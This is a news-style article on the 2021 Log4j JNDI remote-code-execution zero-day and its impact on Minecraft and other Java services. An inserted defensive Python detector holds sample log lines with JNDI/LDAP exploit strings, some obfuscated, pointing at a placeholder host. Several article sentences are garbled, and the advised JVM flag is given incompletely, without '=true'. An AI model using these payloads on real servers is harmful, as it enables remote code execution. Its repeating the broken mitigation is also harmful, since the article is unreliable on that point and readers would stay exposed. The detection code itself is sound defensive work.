Zeroday in ubiquitous Log4j tool poses a grave threat to the Internet



Several websites reported on last Thursday that exploit code has been released for a serious code-execution vulnerability in Log4j, an open-source logging utility that's used in countless apps, including those used by large enterprise organizations.

The best-selling game of all time, Minecraft, was the first game to be exposed to the vulnerability. The sites warned that hackers could execute malicious code on servers or clients running the Java version of the game by manipulating log messages. Log4j was identified as the source of the vulnerability, and exploit code was found circulating online.

A big deal.

HD Moore, founder and CTO of network discovery platform Rumble, said that he thought the Minecraft side was a perfect storm, but that affected applications and devices would continue to be identified for a long time. The dependency on older versions for mod compatibility is a big deal for environments tied to older Java runtimes.

There are reports of internet-wide scans being performed to locate vulnerable servers.

The new Apache Log4j RCE vulnerability is currently being scanned by 2 unique IPs.

A tag to track this activity will be made available soon and will be linked as a reply when released.

December 10, 2021.

Log4j is included in a number of popular frameworks. That means that a lot of third-party apps are vulnerable to exploits that carry the same high severity as those threatening users of Minecraft.

At the time this post went live, there wasn't much information about the vulnerability. One of the earliest sources to give a tracking number was GitHub, which said it was the vulnerability. There are currently many popular systems on the market that are affected by the Log4j RCE zero-day, according to the security firm Cyber Kendra.

Representatives from the Apache Foundation didn't respond to an email about the vulnerability. This Apache page acknowledges that a serious vulnerability was recently fixed. The Java deserialization bug is caused by Log4j making network requests through JNDI to an LDAP server and executing any code that's returned. The bug is triggered by lookup strings inside log messages.
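Because the trigger travels inside whatever gets logged, the scanning traffic described above can be spotted in ordinary access logs. The following is an added, defender-side example that is not from the article or from the Log4j project: a small Python detector (the function names are my own) that collapses the `${lower:...}` and `${...:-default}` nesting Log4j itself resolves, so obfuscated variants are matched as well as plain ones. The sample log lines are constructed, not real traffic.

```python
import re
from urllib.parse import unquote

# One innermost Log4j-style lookup: ${body} with no nested ${...} inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we look for once obfuscation has been collapsed.
_JNDI = re.compile(r"\$\{\s*jndi\s*:")

def _reduce(m):
    """Approximate how Log4j 2 resolves the lookups that get nested for obfuscation.
    Only ${lower:X}, ${upper:X} and the ${anything:-default} form are collapsed;
    every other lookup (including ${jndi:...}) is kept so the detector can see it."""
    body = m.group(1)
    if ":-" in body:                      # ${sys:missing:-j} -> "j"
        return body.split(":-", 1)[1]
    name, sep, value = body.partition(":")
    if sep and name.strip().lower() in ("lower", "upper"):
        return value                      # ${lower:J} -> "J" (case folded later)
    return m.group(0)                     # leave the lookup untouched

def normalize(text, max_rounds=10):
    """URL-decode, then repeatedly collapse inner lookups until nothing changes."""
    text = unquote(unquote(text))         # scanner requests are often encoded twice
    for _ in range(max_rounds):
        new = _INNER.sub(_reduce, text)
        if new == text:
            break
        text = new
    return text.lower()

def is_jndi_probe(line):
    """True if a log line carries a JNDI lookup string, obfuscated or not."""
    return _JNDI.search(normalize(line)) is not None

def scan_log(lines):
    """Return 1-based indexes of suspicious lines in an access or application log."""
    return [i for i, line in enumerate(lines, 1) if is_jndi_probe(line)]

# Constructed sample access-log lines (not real traffic); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.99:1389/a}"',
    '203.0.113.12 - - [10/Dec/2021:12:00:03 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.99%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.68"',
    '203.0.113.13 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:ldap}://203.0.113.99/a}"',
    '203.0.113.14 - - [10/Dec/2021:12:00:05 +0000] "GET /?d=${date:yyyy} HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print("suspicious lines:", scan_log(SAMPLE_LOG))  # [2, 3, 4]
```

Lines 2 to 4 are flagged (plain, URL-encoded and nested forms); the benign `${date:yyyy}` lookup on line 5 is not, which is the distinction a detection rule must make to avoid noise.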


LunaSec said that Java versions greater than 6u211, 7u201, 8u191, and 11.0.1 aren't affected by the attack. JNDI can't load a remote codebase in these versions.

Cloud services from Apple and Steam have also been found to be affected. A different high-severity vulnerability in Struts led to the compromise of Equifax, which spilled sensitive details for more than 142 million US consumers.

The Log4j2 vulnerability was disclosed by the security team at the Alibaba Cloud in November. The latest version of Log4j2 is available here.

What does it mean for the game?

According to the Spigot gaming forum, all versions of the popular game, including the most recent 1.18 release, are vulnerable. The gaming server and news site urged players to take care.

The issue can allow remote access to your computer through the server you log into. Any public server you go onto creates a risk of being hacked.

Success for the exploits is dependent on the version of the Java framework that is running underneath the Minecraft app. It appears that older Java versions have fewer built-in security protections, which makes exploits easier.

Spigot said that adding the JVM flag -Dlog4j2.formatMsgNoLookups is a good way to counteract the threat for most Java versions. Spigot and many other services have already added the flag to the game builds they make available to users.

To add the flag, users should open the Installations tab, select the installation in use, and paste -Dlog4j2.formatMsgNoLookups at the end of the JVM flags field.

For the time being, people should pay close attention to this vulnerability and its potential to cause high-impact attacks against a wide variety of apps and services. For users of the game, that means avoiding unknown or unreliable users. For everyone else, it means checking whether the software they use relies on Log4j or Log4j2 for logging. This is not a good story. If more information becomes available, updates will follow.